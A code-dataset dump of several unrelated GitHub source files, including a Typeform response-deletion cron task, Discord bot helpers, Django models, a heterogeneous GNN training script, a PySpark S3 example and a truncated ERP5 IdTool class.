'included_tokens': response_ids\n }\n )\n\n if del_response.status_code != requests.codes.ok:\n raise ScriptError(f'Failed to delete responses for form: {form_id} - {del_response.status_code}')\n\n def delete_form_responses(self, form_id, response_ids):\n \"\"\"\n Delete all responses for a form in batches of 25 ids (The request to delete responses has IDs in the query, so limiting it to something reasonably small)\n\n :param form_id:\n The string identifier of a Typeform form\n :param response_ids:\n A list of all response ID strings for the given Typeform form\n :return: None\n \"\"\"\n num_to_delete = len(response_ids)\n while 
len(response_ids) > 0:\n to_del = response_ids[:25]\n response_ids = response_ids[25:]\n self.delete_responses(form_id, to_del)\n\n print(f'Deleted {num_to_delete} responses from form {form_id}')\n\n def execute(self):\n \"\"\"\n Kicks off the chain of calls that glues every step together.\n\n 1. Fetch all forms (by page if necessary)\n 2. For each form, fetch all responses (by page if necessary)\n 3. For each form, delete all responses (in batches of 25)\n\n :return: None\n \"\"\"\n try:\n # Get the list of form IDs\n form_id_list = self.get_form_id_list()\n\n if len(form_id_list) == 0:\n print('No forms in account')\n exit(0)\n\n # For each form, fetch the list of response IDs and delete them\n for form_id in form_id_list:\n form_responses = self.get_form_responses(form_id)\n self.delete_form_responses(form_id, form_responses)\n except ScriptError as err:\n print(f'Failed to execute: {err}')\n\n\nif __name__ == '__main__':\n # If the script is called directly, instantiates and executes the process\n if 'TYPEFORM_AUTH_TOKEN' not in os.environ:\n print('You must set TYPEFORM_AUTH_TOKEN')\n exit(1)\n\n # Check the day of the week\n if not datetime.today().weekday() == 0:\n print('This task runs only on Monday')\n exit(0)\n\n delete_responses = DeleteResponses(os.environ['TYPEFORM_AUTH_TOKEN'])\n delete_responses.execute()\n","repo_name":"MozillaFoundation/mofo-cron","sub_path":"tasks/typeform/delete_responses.py","file_name":"delete_responses.py","file_ext":"py","file_size_in_byte":9111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"21849066958","text":"import colorama\r\nimport discord\r\nimport files.information\r\nfrom colorama import init, Fore, Back, Style\r\nfrom files.information import prefix\r\ninit(autoreset=True)\r\nprint(__name__ + '.py ' + Fore.GREEN + 'loaded')\r\n\r\n# error_function print format\r\nasync def error_function(function_name, error_type, message, author, bot):\r\n await bot.send_message(author,'Error : '+error_type+', '+function_name+' Function\\n```Input : '+message.content+'```')\r\n print(Fore.RED+'Error : '+error_type+Fore.RESET+', '+Fore.YELLOW+function_name+Fore.RESET+' Function')\r\n\r\n# bool, message_sw,\r\ndef message_sw(message, cmd_1, cmd_2 = None):\r\n if cmd_1 and cmd_2:\r\n if message.content.startswith(prefix+cmd_1) or message.content.startswith(prefix+cmd_2):\r\n return True\r\n elif cmd_1:\r\n if message.content.startswith(prefix+cmd_1):\r\n return True\r\n else:\r\n return False\r\n\r\n# bool, checks for id\r\ndef is_owner(message):\r\n if message.author.id == message.server.owner.id:\r\n return True\r\n else:\r\n return False\r\n\r\n# bool, checks for roles\r\ndef has_roles(message, role_1, role_2 = None):\r\n has_role_1 = discord.utils.get(message.server.roles, name=role_1)\r\n print(str(role_1))\r\n print(str(has_role_1))\r\n if role_1 and role_2:\r\n has_role_2 = discord.utils.get(message.server.roles, name=role_2)\r\n for i in message.author.roles:\r\n if i == has_role_1 or i == has_role_2:\r\n return True\r\n elif role_1:\r\n for i in message.author.roles:\r\n if i == has_role_1:\r\n return True\r\n else:\r\n return False\r\n","repo_name":"drumman22/drum-bot","sub_path":"drum-bot/files/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"34383027726","text":"import json\n\nfrom database import Session\nfrom models import Category, 
Goods\nfrom util import default_all, default_one\n\n\ndef all(limit):\n return default_all(Category, Category.id, limit)\n\n\ndef one(id):\n return default_one(Category, id)\n\n\ndef add(info):\n s = Session()\n\n try:\n # check if category with the same title exists\n q = s.query(Category).filter(Category.title == info.get('title'))\n if q.count() > 0:\n # exists\n cat = q.one()\n if cat.for_sale:\n # the existing category is for sale, meaning duplicated category\n raise Exception\n\n # update the info, and make the category for sale\n info['for_sale'] = True\n result = json.loads(update(q.one().id, info))\n result['id'] = cat.id\n else:\n # does not exist, then create a new one\n cat = Category(**info)\n s.add(cat)\n s.commit()\n result = {'ok': True, 'id': cat.id}\n except Exception:\n result = {'ok': False}\n\n s.close()\n return json.dumps(result)\n\n\ndef update(id, info):\n s = Session()\n\n try:\n # check if the category exists\n q = s.query(Category).filter(Category.id == id)\n if q.count() < 1:\n # does not exist\n raise Exception\n\n # update it\n q.update(info)\n s.commit()\n\n result = {'ok': True}\n except Exception:\n result = {'ok': False}\n\n s.close()\n return json.dumps(result)\n\n\ndef delete(id):\n s = Session()\n\n try:\n # check if category with the same title exists\n q = s.query(Category).filter(Category.id == id)\n if q.count() < 1:\n # does not exist\n raise Exception\n\n if not q.one().for_sale:\n # not for sale, meaning already deleted\n raise Exception\n\n # get all goods in this category\n goods = q.one().goods\n\n # make this category not for sale\n q.update({'for_sale': False})\n\n # make all goods in this category not for sale\n for g in goods:\n q = s.query(Goods).filter(Goods.id == g.id)\n q.update({'for_sale': False})\n\n s.commit()\n\n result = {'ok': True}\n except Exception:\n result = {'ok': False}\n\n s.close()\n return json.dumps(result)\n","repo_name":"richardchien/project-sally-backend","sub_path":"api_handler/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"617095942","text":"'''\n1. 题目说明:\n请开启PYD602.py档案,依下列题意进行作答,输出并计算五张牌总和,使输出值符合题意要求。作答完成请另存新档为PYA602.py再进行评分。\n\n2. 设计说明:\n请撰写一程式,让使用者输入52张牌中的5张,计算并输出其总和。\n\n提示:J、Q、K以及A分别代表11、12、13以及1。\n\n3. 
输入输出:\n输入说明\n5张牌数\n\n输出说明\n5张牌的数值总和\n\n输入输出范例\n范例输入\n5\n10\nK\n3\nA\n范例输出\n32\n'''\ncards = []\nresult = 0\nfor i in range(5):\n cards.append(input())\n\nfor i in range(5):\n if cards[i] == 'A': result += 1\n elif cards[i] == \"J\": result += 11\n elif cards[i] == \"Q\": result += 12\n elif cards[i] == \"K\": result += 13\n elif cards[i] == \"10\": result += 10\n else:\n result += eval(cards[i])\nprint(result)","repo_name":"roberthsu2003/python","sub_path":"TQC/PYD602.py","file_name":"PYD602.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"zh","doc_type":"code","stars":183,"dataset":"github-code","pt":"75"} +{"seq_id":"6609022517","text":"from utils.exceptions import FloatError, NotInMenuError\n\ndef inputText() -> list[str]:\n with open(\"laba12/input.txt\", encoding=\"UTF-8\") as f: \n lines = f.read()\n text = lines.split('\\n')\n return text\n\ndef validateInput(prompt, start, end) -> int:\n while True:\n try:\n num = float(input(prompt))\n if int(num) != num:\n raise FloatError\n if not(start <= int(num) <= end):\n raise NotInMenuError\n return int(num)\n except FloatError:\n print(\"Введенное число должно быть целым!\")\n except ValueError:\n print(\"Введенное должно быть числом!\")\n except NotInMenuError:\n print(\"Такого значения нет в меню!\")\n \n\ndef getUsersChoiceFromMenu() -> int:\n prompt = (\"\"\"\\nМеню:\n1. Выровнять текст по левому краю\n2. Выровнять текст по правому краю\n3. Выровнять текст по ширине\n4. Удаление всех вхождений заданного слова\n5. Замена одного слова другим во всем тексте\n6. Выполнение умножения и деления в тексте\n7. Самое короткое предложение по кол-ву слов\n0. Выход\\n\"\"\")\n print(prompt)\n res = validateInput(\"Выберите пункт меню: \", 0, 7)\n return res\n\n\ndef printText(text: list[str], ignore: int = -1) -> None:\n print()\n string = \"\"\n sentenceIndex = 1\n for line in text:\n for c in line:\n if c == \".\":\n sentenceIndex += 1\n if sentenceIndex != ignore:\n string += c\n if sentenceIndex != ignore:\n string += '\\n'\n print(string)\n","repo_name":"ofdun/BMSTU-Programming","sub_path":"laba12/utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14561679490","text":"from django.core.validators import MinValueValidator, MaxValueValidator\nfrom messenger_users import models as user_models\nfrom posts.models import Post, Interaction\nfrom dateutil import parser, relativedelta\nfrom attributes.models import Attribute\nfrom programs.models import Program\nfrom entities.models import Entity\nfrom django.utils import timezone\nfrom areas.models import Area\nimport datetime\nfrom django.db import models\nfrom django.db.models.aggregates import Max\n\n\nclass Instance(models.Model):\n entity = models.ForeignKey(Entity, on_delete=models.CASCADE)\n name = models.TextField()\n attributes = models.ManyToManyField(Attribute, through='AttributeValue')\n program = models.ForeignKey(\n Program, on_delete=models.DO_NOTHING, null=True)\n sessions = models.ManyToManyField(Session)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n permissions = (\n ('view_all_instances', 'User can view all instances'),\n )\n\n def __str__(self):\n return self.name\n\n def get_users(self):\n return user_models.User.objects \\\n .filter(id__in=set(assoc.user_id for assoc in self.instanceassociationuser_set.all()))\n\n def get_months(self):\n if 
self.entity_id == 1:\n births = self.attributevalue_set.filter(attribute__name='birthday')\n if not births.exists():\n return None\n birth = births.last()\n print(self)\n print(birth)\n try:\n birthday = parser.parse(birth.value)\n if timezone.is_aware(birthday):\n now = timezone.now()\n else:\n now = datetime.datetime.now()\n rd = relativedelta.relativedelta(now, birthday)\n if rd.months:\n months = rd.months\n else:\n months = 0\n if rd.years:\n months = months + (rd.years * 12)\n return months\n except:\n return None\n elif self.entity_id == 2:\n pregnant_weeks = self.attributevalue_set.filter(\n attribute__name='pregnant_weeks')\n if not pregnant_weeks.exists():\n return None\n pw = pregnant_weeks.last()\n months = round(int(pw.value) / 4)\n if months == 0:\n months = -1\n return months\n else:\n return None\n\n def get_weeks(self):\n if self.entity_id == 2:\n pregnant_weeks = self.attributevalue_set.filter(\n attribute__name='pregnant_weeks')\n if not pregnant_weeks.exists():\n return None\n pw = pregnant_weeks.last()\n weeks = int(pw.value)\n if weeks == 0:\n weeks = -1\n return weeks\n else:\n return None\n\n def get_time_feeds(self, first_limit, last_limit):\n feeds = self.instancefeedback_set.filter(\n created_at__gte=first_limit, created_at__lte=last_limit)\n return feeds\n\n def get_time_interactions(self, first_limit, last_limit):\n interactions = Interaction.objects.filter(created_at__gte=first_limit, created_at__lte=last_limit,\n instance_id=self.pk)\n return interactions\n\n\n def get_activities(self):\n posts = Post.objects.filter(id__in=set([x.post_id for x in Interaction.objects.filter(instance_id=self.pk)]))\\\n .only('id', 'name')\n for post in posts:\n post.assign = Interaction.objects.filter(\n post_id=post.id, type='dispatched', instance_id=self.pk).last()\n sessions = Interaction.objects.filter(\n post_id=post.id, type='session', instance_id=self.pk)\n if sessions.count() > 0:\n post.completed = sessions.last()\n else:\n post.completed = None\n return posts\n\n def get_activities_area(self, area, first_limit, last_limit):\n if area > 0:\n posts = Post.objects.\\\n filter(id__in=set([x.post_id for x in Interaction.objects.filter(instance_id=self.pk)\n .filter(created_at__gte=first_limit, created_at__lte=last_limit, type='session')])) \\\n .filter(area_id=area).only('id', 'name')\n else:\n posts = Post.objects. 
\\\n filter(id__in=set([x.post_id for x in Interaction.objects.filter(instance_id=self.pk)\n .filter(created_at__gte=first_limit, created_at__lte=last_limit, type='session')])) \\\n .only('id', 'name')\n return posts\n\n def get_completed_activities(self, tipo='session'):\n posts = Post.objects\\\n .filter(id__in=set([x.post_id for x in Interaction.objects.filter(instance_id=self.pk, type=tipo)]))\\\n .only('id')\n return posts\n\n def get_attributes(self):\n attributes_ids = set(item.pk for item in self.attributes.all())\n attributes = Attribute.objects.filter(id__in=attributes_ids)\n for attribute in attributes:\n attribute.assign = self.attributevalue_set.filter(\n attribute=attribute).last()\n return attributes\n\n def get_attribute_values(self, name):\n attribute = self.attributevalue_set.filter(attribute__name=name)\n if not attribute.count() > 0:\n return None\n return attribute.last()\n\n def is_session_active(self):\n sessions = self.sessions.filter(\n created_at__gte=timezone.now() - datetime.timedelta(days=7))\n return sessions.exists()\n\n# Child Association with parent\n\n\nclass InstanceAssociationUser(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n user = models.ForeignKey('messenger_users.User',\n on_delete=models.CASCADE, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Score(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n area = models.ForeignKey(Area, on_delete=models.CASCADE)\n value = models.FloatField(default=0, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.instance.name + '__' + self.area.name + '__' + str(round(self.value, 2))\n\n\nclass ScoreTracking(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n area = models.ForeignKey(Area, on_delete=models.CASCADE)\n value = models.FloatField(default=0, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.instance.name + '__' + self.area.name + '__' + str(round(self.value, 2))\n\n\nclass Response(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n milestone = models.ForeignKey(Milestone, on_delete=models.CASCADE)\n response = models.CharField(max_length=255)\n session = models.ForeignKey(\n Session, on_delete=models.SET_NULL, null=True, blank=True)\n created_at = models.DateTimeField()\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return \"%s__%s__%s%s__%s\" % (self.pk, self.instance.name, self.milestone.pk, self.milestone.name, self.response)\n\n\nclass AttributeValue(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n attribute = models.ForeignKey(Attribute, on_delete=models.CASCADE)\n value = models.TextField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return \"%s__%s__%s__%s\" % (self.pk, self.instance.name, self.attribute.name, self.value)\n\n\nclass PostInteraction(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n post_id = models.IntegerField()\n type = models.CharField(max_length=255, default='open')\n value = models.IntegerField(default=0)\n created_at = models.DateTimeField()\n\n def __str__(self):\n return \"%s %s %s %s\" % (self.pk, self.instance, self.post_id, 
self.type)\n\n\nREGISTER_TYPE_CHOICES = (\n (0, \"Script with number\"),\n (1, \"Script with text\")\n)\n\n\nclass InstanceFeedback(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n post_id = models.IntegerField()\n area = models.ForeignKey(Area, on_delete=models.CASCADE)\n value = models.IntegerField(default=1, validators=[\n MinValueValidator(0), MaxValueValidator(5)])\n reference_text = models.CharField(max_length=50)\n register_id = models.IntegerField(null=True)\n register_type = models.CharField(max_length=20, default=0)\n migration_field_id = models.IntegerField(null=True, blank=True)\n created_at = models.DateTimeField()\n\n def __str__(self):\n return \"%s %s %s %s\" % (self.pk, self.instance_id, self.area, self.value)\n\n\nclass MilestoneInteraction(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n milestone_id = models.IntegerField()\n type = models.CharField(max_length=255, default='hitos_monitoreo')\n value = models.IntegerField(default=0)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return \"%s %s %s %s\" % (self.pk, self.instance, self.milestone_id, self.type)\n","repo_name":"afinidata2019/afinidata-content-manager","sub_path":"instances/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26421268105","text":"import copy\r\nimport torch\r\nimport deepsnap\r\nimport numpy as np\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch_geometric.nn as pyg_nn\r\n\r\nfrom hetero_gnn import HeteroGNN\r\n\r\nfrom sklearn.metrics import f1_score\r\nfrom deepsnap.hetero_gnn import forward_op\r\nfrom deepsnap.hetero_graph import HeteroGraph\r\nfrom torch_sparse import SparseTensor, matmul\r\n\r\nimport pandas as pd\r\n\r\n\r\ndef train(model, optimizer, hetero_graph, train_idx):\r\n model.train()\r\n optimizer.zero_grad()\r\n preds = model(hetero_graph.node_feature, hetero_graph.edge_index)\r\n\r\n loss = None\r\n\r\n ############# Your code here #############\r\n ## Note:\r\n ## 1. Compute the loss here\r\n ## 2. 
`deepsnap.hetero_graph.HeteroGraph.node_label` is useful\r\n\r\n loss = model.loss(preds, hetero_graph.node_label, train_idx)\r\n\r\n loss.backward()\r\n optimizer.step()\r\n return loss.item()\r\n\r\n\r\ndef mytest(model, graph, indices, best_model=None, best_val=0, save_preds=False, agg_type=None):\r\n model.eval()\r\n accs = []\r\n for i, index in enumerate(indices):\r\n preds = model(graph.node_feature, graph.edge_index)\r\n num_node_types = 0\r\n micro = 0\r\n macro = 0\r\n for node_type in preds:\r\n idx = index[node_type]\r\n pred = preds[node_type][idx]\r\n pred = pred.max(1)[1]\r\n label_np = graph.node_label[node_type][idx].cpu().numpy()\r\n pred_np = pred.cpu().numpy()\r\n micro = f1_score(label_np, pred_np, average='micro')\r\n macro = f1_score(label_np, pred_np, average='macro')\r\n num_node_types += 1\r\n\r\n # Averaging f1 score might not make sense, but in our example we only\r\n # have one node type\r\n micro /= num_node_types\r\n macro /= num_node_types\r\n accs.append((micro, macro))\r\n\r\n # Only save the test set predictions and labels!\r\n if save_preds and i == 2:\r\n print(\"Saving Heterogeneous Node Prediction Model Predictions with Agg:\", agg_type)\r\n print()\r\n\r\n data = {}\r\n data['pred'] = pred_np\r\n data['label'] = label_np\r\n\r\n df = pd.DataFrame(data=data)\r\n # Save locally as csv\r\n df.to_csv('ACM-Node-' + agg_type + 'Agg.csv', sep=',', index=False)\r\n\r\n if accs[1][0] > best_val:\r\n best_val = accs[1][0]\r\n best_model = copy.deepcopy(model)\r\n return accs, best_model, best_val\r\n\r\n\r\ndef load_data(args):\r\n print(\"Device: {}\".format(args['device']))\r\n\r\n # Load the data\r\n data = torch.load(\"acm.pkl\")\r\n\r\n # Message types\r\n message_type_1 = (\"paper\", \"author\", \"paper\")\r\n message_type_2 = (\"paper\", \"subject\", \"paper\")\r\n\r\n print(data)\r\n\r\n # Dictionary of edge indices\r\n edge_index = dict()\r\n edge_index[message_type_1] = data['pap']\r\n edge_index[message_type_2] = data['psp']\r\n\r\n # Dictionary of node features\r\n node_feature = dict()\r\n node_feature[\"paper\"] = data['feature']\r\n\r\n # Dictionary of node labels\r\n node_label = dict()\r\n node_label[\"paper\"] = data['label']\r\n\r\n # Load the train, validation and test indices\r\n train_idx = {\"paper\": data['train_idx'].to(args['device'])}\r\n val_idx = {\"paper\": data['val_idx'].to(args['device'])}\r\n test_idx = {\"paper\": data['test_idx'].to(args['device'])}\r\n\r\n # Construct a deepsnap tensor backend HeteroGraph\r\n hetero_graph = HeteroGraph(\r\n node_feature=node_feature,\r\n node_label=node_label,\r\n edge_index=edge_index,\r\n directed=True\r\n )\r\n\r\n print(f\"ACM heterogeneous graph: {hetero_graph.num_nodes()} nodes, {hetero_graph.num_edges()} edges\")\r\n\r\n # Node feature and node label to device\r\n for key in hetero_graph.node_feature:\r\n hetero_graph.node_feature[key] = hetero_graph.node_feature[key].to(args['device'])\r\n for key in hetero_graph.node_label:\r\n hetero_graph.node_label[key] = hetero_graph.node_label[key].to(args['device'])\r\n\r\n # Edge_index to sparse tensor and to device\r\n for key in hetero_graph.edge_index:\r\n edge_index = hetero_graph.edge_index[key]\r\n adj = SparseTensor(row=edge_index[0], col=edge_index[1],\r\n sparse_sizes=(hetero_graph.num_nodes('paper'), hetero_graph.num_nodes('paper')))\r\n hetero_graph.edge_index[key] = adj.t().to(args['device'])\r\n print(hetero_graph.edge_index[message_type_1])\r\n print(hetero_graph.edge_index[message_type_2])\r\n\r\n return hetero_graph, 
train_idx, val_idx, test_idx\r\n\r\n\r\ndef run_model1(hetero_graph, train_idx, val_idx, test_idx, args):\r\n best_model = None\r\n best_val = 0\r\n\r\n model = HeteroGNN(hetero_graph, args, aggr=\"mean\").to(args['device'])\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args['lr'], weight_decay=args['weight_decay'])\r\n\r\n for epoch in range(args['epochs']):\r\n loss = train(model, optimizer, hetero_graph, train_idx)\r\n accs, best_model, best_val = mytest(model, hetero_graph, [train_idx, val_idx, test_idx], best_model, best_val)\r\n print(\r\n f\"Epoch {epoch + 1}: loss {round(loss, 5)}, \"\r\n f\"train micro {round(accs[0][0] * 100, 2)}%, train macro {round(accs[0][1] * 100, 2)}%, \"\r\n f\"valid micro {round(accs[1][0] * 100, 2)}%, valid macro {round(accs[1][1] * 100, 2)}%, \"\r\n f\"test micro {round(accs[2][0] * 100, 2)}%, test macro {round(accs[2][1] * 100, 2)}%\"\r\n )\r\n best_accs, _, _ = mytest(best_model, hetero_graph, [train_idx, val_idx, test_idx], save_preds=True,\r\n agg_type=\"Mean\")\r\n print(\r\n f\"Best model: \"\r\n f\"train micro {round(best_accs[0][0] * 100, 2)}%, train macro {round(best_accs[0][1] * 100, 2)}%, \"\r\n f\"valid micro {round(best_accs[1][0] * 100, 2)}%, valid macro {round(best_accs[1][1] * 100, 2)}%, \"\r\n f\"test micro {round(best_accs[2][0] * 100, 2)}%, test macro {round(best_accs[2][1] * 100, 2)}%\"\r\n )\r\n\r\n\r\ndef run_model2(hetero_graph, train_idx, val_idx, test_idx, args):\r\n best_model = None\r\n best_val = 0\r\n\r\n output_size = hetero_graph.num_node_labels('paper')\r\n model = HeteroGNN(hetero_graph, args, aggr=\"attn\").to(args['device'])\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args['lr'], weight_decay=args['weight_decay'])\r\n\r\n for epoch in range(args['epochs']):\r\n loss = train(model, optimizer, hetero_graph, train_idx)\r\n accs, best_model, best_val = mytest(model, hetero_graph, [train_idx, val_idx, test_idx], best_model, best_val)\r\n print(\r\n f\"Epoch {epoch + 1}: loss {round(loss, 5)}, \"\r\n f\"train micro {round(accs[0][0] * 100, 2)}%, train macro {round(accs[0][1] * 100, 2)}%, \"\r\n f\"valid micro {round(accs[1][0] * 100, 2)}%, valid macro {round(accs[1][1] * 100, 2)}%, \"\r\n f\"test micro {round(accs[2][0] * 100, 2)}%, test macro {round(accs[2][1] * 100, 2)}%\"\r\n )\r\n best_accs, _, _ = mytest(best_model, hetero_graph, [train_idx, val_idx, test_idx], save_preds=True,\r\n agg_type=\"Attention\")\r\n print(\r\n f\"Best model: \"\r\n f\"train micro {round(best_accs[0][0] * 100, 2)}%, train macro {round(best_accs[0][1] * 100, 2)}%, \"\r\n f\"valid micro {round(best_accs[1][0] * 100, 2)}%, valid macro {round(best_accs[1][1] * 100, 2)}%, \"\r\n f\"test micro {round(best_accs[2][0] * 100, 2)}%, test macro {round(best_accs[2][1] * 100, 2)}%\"\r\n )\r\n\r\n if model.convs1.alpha is not None and model.convs2.alpha is not None:\r\n for idx, message_type in model.convs1.mapping.items():\r\n print(f\"Layer 1 has attention {model.convs1.alpha[idx]} on message type {message_type}\")\r\n for idx, message_type in model.convs2.mapping.items():\r\n print(f\"Layer 2 has attention {model.convs2.alpha[idx]} on message type {message_type}\")\r\n\r\n\r\ndef run_main():\r\n # Please do not change the following parameters\r\n args = {\r\n 'device': torch.device('cuda' if torch.cuda.is_available() else 'cpu'),\r\n 'hidden_size': 64,\r\n 'epochs': 100,\r\n 'weight_decay': 1e-5,\r\n 'lr': 0.003,\r\n 'attn_size': 32,\r\n }\r\n\r\n hetero_graph, train_idx, val_idx, test_idx = load_data(args)\r\n\r\n # 
run_model1(hetero_graph, train_idx, val_idx, test_idx, args)\r\n    run_model2(hetero_graph, train_idx, val_idx, test_idx, args)\r\n\r\n\r\nif __name__ == '__main__':\r\n    run_main()\r\n","repo_name":"ssd227/GNN","sub_path":"cs224w/colab5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"36896103891","text":"from django.db import models\n\n# Create your models here.\nfrom django.utils.translation import gettext_lazy as _\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom core.models import DefaultObject\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.core.exceptions import ValidationError, FieldError\nimport room_equipment.models\nfrom django.utils.html import mark_safe\n\nclass Manufacturer(DefaultObject, models.Model):\n\n    \"\"\"\n    Item Manufacturer\n    \"\"\"\n\n    logo = models.ImageField(\n        _(\"logo\"), \n        upload_to='uploads/logo/manufacturer', \n        height_field=None, \n        width_field=None, \n        max_length=None,\n        blank=True\n    )\n\n\n    class Meta:\n        verbose_name = _(\"Manufacturer\")\n        verbose_name_plural = _(\"Manufacturers\")\n\n    def __str__(self):\n        return self.name\n\n    def get_absolute_url(self):\n        return reverse(\"Manufacturer_detail\", kwargs={\"pk\": self.pk})\n\n    def logo_tag(self):\n        if self.logo:\n            return mark_safe('<img src=\"%s\" />'%(self.logo.url))\n        return None\n    logo_tag.short_description = 'Manufacturer logo'\n    logo_tag.allow_tags = True\n\nclass Item(DefaultObject, models.Model):\n    \"\"\"\n    Item\n    \"\"\"\n    manufacturer_fk = models.ForeignKey(\n        Manufacturer, verbose_name=_(\"manufacturer\"), on_delete=models.CASCADE,\n        null=True)\n    model = models.CharField(_(\"model\"), max_length=50, blank=True)\n    is_consumable = models.BooleanField(_(\"is_consumable\"),default=False)\n    icon = models.ImageField(\n        _(\"icon\"), \n        upload_to='uploads/icons/item', \n        height_field=None, \n        width_field=None, \n        max_length=None,\n        blank=True\n    )\n\n    class Meta:\n        verbose_name = _(\"Item\")\n        verbose_name_plural = _(\"Items\")\n\n    def __str__(self):\n        return self.name\n\n    def get_absolute_url(self):\n        return reverse(\"Item_detail\", kwargs={\"pk\": self.pk})\n    def icon_tag(self):\n        if self.icon:\n            return mark_safe('<img src=\"%s\" />'%(self.icon.url))\n        return None\n    icon_tag.short_description = 'Item icon'\n    icon_tag.allow_tags = True\n\nclass ItemLocation(models.Model):\n    \"\"\"\n    Item location\n    \"\"\"\n    description = models.TextField(_(\"description\"),blank=True)\n    container_item_fk = models.ForeignKey(\n        room_equipment.models.ContainerItem, \n        verbose_name=_(\"container_item\"), \n        on_delete=models.CASCADE, null=True\n    )\n    item_fk = models.ForeignKey(Item, verbose_name=_(\"item\"), on_delete=models.CASCADE)\n    serial = models.CharField(_(\"serial\"), max_length=50,blank=True)\n    pieces = models.IntegerField(_(\"pieces\"))\n    mac = models.CharField(_(\"mac\"), max_length=50,blank=True)\n    ip = models.CharField(_(\"ip\"), max_length=50,blank=True)\n\n\n    class Meta:\n        verbose_name = _(\"ItemLocation\")\n        verbose_name_plural = _(\"ItemLocations\")\n\n    def get_info(self):\n        return f\"{self.item_fk.name} x{self.pieces}\"\n\n    def __str__(self):\n        return self.get_info()\n\n    def get_absolute_url(self):\n        return reverse(\"ItemLocation_detail\", kwargs={\"pk\": 
self.pk})","repo_name":"coconutcake/isk","sub_path":"app/stock/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"4174865883","text":"from pyspark.sql import SparkSession\nfrom pyspark import SparkContext, SparkConf\n\n# Create a SparkContext with the Hadoop-AWS dependency\nconf = SparkConf().set('spark.jars.packages', 'org.apache.hadoop:hadoop-aws:3.3.1')\nsc = SparkContext(conf=conf)\n\n# Configure S3 bucket credentials\nACCESS_KEY_ID = \"YOUR ACCESS KEY\"\nSECRET_ACCESS_KEY = \"YOUR SECRET KEY\"\nENDPOINT = \"S3 API Endpoint\"\n\nsc._jsc.hadoopConfiguration().set('fs.s3a.access.key', ACCESS_KEY_ID)\nsc._jsc.hadoopConfiguration().set('fs.s3a.secret.key', SECRET_ACCESS_KEY)\nsc._jsc.hadoopConfiguration().set('fs.s3a.endpoint', ENDPOINT)\n\n# Create a SparkSession\nspark = SparkSession(sc)\n\n# Read data from S3\ndf = spark.read.option('header', 'true').csv(\"s3a://XXXXXX/data.csv\")\n\n# Process and analyze the data\ndf.show()\n","repo_name":"00mjk/Lyve-Cloud-Solutions-Samples","sub_path":"apache-spark/pyspark_example.py","file_name":"pyspark_example.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"}
{"seq_id":"71249271603","text":"import six\nimport warnings\nimport zope.interface\n\nfrom Acquisition import aq_base\nfrom AccessControl import ClassSecurityInfo\nfrom Products.ERP5Type.Globals import InitializeClass, DTMLFile, PersistentMapping\nfrom Products.ERP5Type.Tool.BaseTool import BaseTool\nfrom Products.ERP5Type.Cache import caching_instance_method\nfrom Products.ERP5Type import Permissions, interfaces\nfrom zLOG import LOG, WARNING, INFO, ERROR\nfrom Products.ERP5 import _dtmldir\n\nfrom BTrees.Length import Length\n\n_marker = object()\n\n@zope.interface.implementer(interfaces.IIdTool)\nclass IdTool(BaseTool):\n  \"\"\"\n    This tool handles the generation of IDs.\n  \"\"\"\n  id = 'portal_ids'\n  meta_type = 'ERP5 Id Tool'\n  portal_type = 'Id Tool'\n  title = 'Id Generators'\n\n  # Declarative Security\n  security = ClassSecurityInfo()\n\n  security.declareProtected( Permissions.ManagePortal, 'manage_overview' )\n  manage_overview = DTMLFile( 'explainIdTool', _dtmldir )\n\n  def newContent(self, *args, **kw):\n    \"\"\"\n      the newContent is overridden to not use generateNewId\n    \"\"\"\n    if 'id' not in kw:\n      new_id = self._generateNextId()\n      if new_id is not None:\n        kw['id'] = new_id\n      else:\n        raise ValueError('Failed to generate id')\n    return BaseTool.newContent(self, *args, 